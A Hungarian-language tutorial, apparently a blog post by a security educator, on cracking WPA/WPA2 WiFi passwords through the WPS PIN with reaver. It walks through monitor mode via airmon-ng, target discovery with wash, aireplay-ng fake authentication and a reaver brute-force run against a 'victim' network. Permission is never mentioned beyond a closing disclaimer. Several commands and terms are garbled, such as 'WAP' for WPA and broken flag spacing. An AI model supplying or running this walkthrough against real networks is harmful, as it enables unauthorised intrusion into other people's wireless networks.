Mindannyian tudjuk, hogy a legtöbb ember inkább WiFi jelszót ad a vezeték nélküli kapcsolatához. Ez lehet olyan egyszerű, mint az 12345, vagy olyan összetett, mint több betű,szám és karakter kombinációja. Nos, itt a rossz hír, létezik egy reaver nevű eszköz, amellyel feltörhető a WAP/WAP2 WiFi jelszó.
A WEP-ről, WAP-ról és WAP2-ről
A WEP (Wired Equivalent Privacy) funkcióinak javítására 2003-ban létrehozták a WiFi Protected Access vagy WPA nevű eszközt. Ez az ideiglenes fejlesztés még mindig viszonylag gyenge biztonsággal rendelkezik, de könnyebben konfigurálható. A WPA a TKIP (Temporal Key Integrity Protocol) protokollt használja a WEP által kínáltnál biztonságosabb titkosításhoz.
Egy évvel később, 2004-ben elérhetővé vált a WiFi Protected Access 2 (WiFi Protected Access 2). A WPA2 erősebb biztonsággal rendelkezik, és könnyebben konfigurálható, mint az előző opciók. A WPA2 fő különbsége, hogy a TKIP helyett a fejlett titkosítási szabványt (AES) használja.
Mire van szüksége.
- Egy WiFi adapter, amely támogatja a monitor üzemmódot
- Egy számítógép WiFi-vel
- Egy közeli WPA-val védett WiFi hálózat
- Reaver telepítve
- Persistence
Feltételezem, hogy a routered úgy van beállítva, hogy ne használjon Push Button Authentication-t.(PBC)
Legyen így
Először, ha virtuális gépet használsz, engedélyezned kell az USB vezérlőt a beállításoknál, majd kattints az USB-re, és válaszd ki az USB eszközt.
NB: Győződj meg róla, hogy az általad használt vezeték nélküli adapter támogatja a monitor módot.
Ezután futtassa a következő parancsot:
iwconfig
Ez a parancs csak a vezeték nélküli interfészeket mutatja
Futtassa:
sudo ifconfig wlan0 down
Ez letiltja a WiFi-t
Majd:
sudo airmon-ng check kill
Ez a parancs megöl minden olyan folyamatot, amely zavarhatja az interfészem monitor módban történő használatát. Megöli a hálózatkezelőt, így nincs internet.
Ezután futtatja:
iwconfig wlan0 mode monitor
Ez a parancs a kezelt módról monitor módra vált.
A menedzselt üzemmód az összes vezeték nélküli eszköz alapértelmezett üzemmódja.
Azért kell a módot menedzseltről monitor üzemmódra változtatni, mert nem csak azokat a csomagokat szeretnénk rögzíteni, amelyeknek a mi eszközünkhöz tartozó mac-címe van, hanem az összes csomagot, még a routerhez és más eszközökhöz küldötteket is. Ez csak akkor lehetséges, ha a WiFi adapter monitor módban van.
Ezután futtassuk:
sudo ifconfig wlan0 up
Ezzel a wifi újra működésbe lép.
Ezután futtassuk:
iwconfig
Ezzel ellenőrizzük, hogy a módunk menedzseltről monitor módra változott. Ha igen, akkor azt a terminálban jelezni kell.
Az alábbi ábrán látható, hogy a mód monitorra változott.
wash - interface wlan0
Ez mutatja az összes WPS engedélyezett Aps-t a vezeték nélküli interfész használatával.
Aireplay-ng - fakeauth 30 -a<bssid> -h <macid> wlan0
A mac ID-hez nyisson egy új lapot és írja be az ifconfig-et. Másold be az első 12 számjegyet az unspec-ből a wlan0-ba.
Ne nyomj még ENTER-t.
Nyiss egy másik új lapot.
GYőződj meg róla, hogy a reaver telepítve van. Ha nincs, futtasd a következő parancsot.
Sudo apt-get install aircrack-ng reaver
Ez telepíti a reavert.
A reaver nyers erővel megkeresi a pin-t és hozzárendeli a célponthoz, ha megvan a pin, akkor azt használja a tényleges WAP/WAP2 kulcs kiszámításához.
Ezután futtassa a következő parancsot:
Reaver - bssid<victim bssid> - channel <the channel of the victim> - interface wlan0 –vvv - no-associate
Üsse le az Entert ezen a lapon és a másik lapon is, amire azt mondtam, hogy ne nyomja le az Entert.
Ez eltarthat pár percig, mivel az összes lehetséges kombinációt kipróbálja, és végül megadja a WPS pin-t, a WAP jelszót és a Wi-Fi
Nevét. Ez a cikk tanulási célokat szolgál, nem vállalunk felelősséget a cikkre való hivatkozás során okozott károkért.
A cikket Restercuter Nyawira, a SheHacks KE tagja, oktató és a kiberbiztonság szerelmese írta. Megtalálható a LinkedIn-en (Restercuter Nyawira) és a Twitteren @Restercuter1.